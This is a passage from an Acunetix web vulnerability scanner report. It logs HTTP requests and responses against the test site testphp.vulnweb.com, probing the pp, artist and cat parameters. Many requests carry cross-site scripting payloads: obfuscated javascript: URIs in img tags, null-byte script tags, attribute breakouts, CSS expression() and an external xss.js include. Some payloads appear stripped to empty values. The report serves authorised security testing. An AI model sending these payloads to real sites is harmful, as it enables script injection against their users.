.NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

91

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28541805967386%29%3B%22 %3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

92

/hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=<%00script>alert(541765967386)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

93

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

94

/listproducts.php Details

Request GET /listproducts.php?artist=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28488775932879%29% 3B%22%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist=email@somealert(488755932879)%3Bdomai n.com HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

95

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

96

/listproducts.php Details

Request GET /listproducts.php?artist=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28488935932953%29%3B%22%3 E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

97

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=alert(488695932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist="+src="http://testphp.acunetix.com/xss.js?4891559 33047"> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

98

/listproducts.php Details Request GET /listproducts.php?artist=

alert(489175933047)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=alert(488735932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=>'>alert(488705932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

99

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request Acunetix Website Audit

100

GET /listproducts.php?artist=alert(488725932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=>">alert(488715932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=-->alert(488745932879)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Acunetix Website Audit

101

Content-Type: text/html Connection: close /listproducts.php Details Request GET /listproducts.php?artist=%3C/xss/*-*/style=xss:e/**/xpression(alert(489385933127))%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=alert(488835932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=alert(488825932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Acunetix Website Audit

102

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=-->alert(488845932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=>'>alert(488805932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request Acunetix Website Audit

103

GET /listproducts.php?cat=>">alert(488815932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=alert(488795932881)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

104

/listproducts.php Details Request GET /listproducts.php?cat=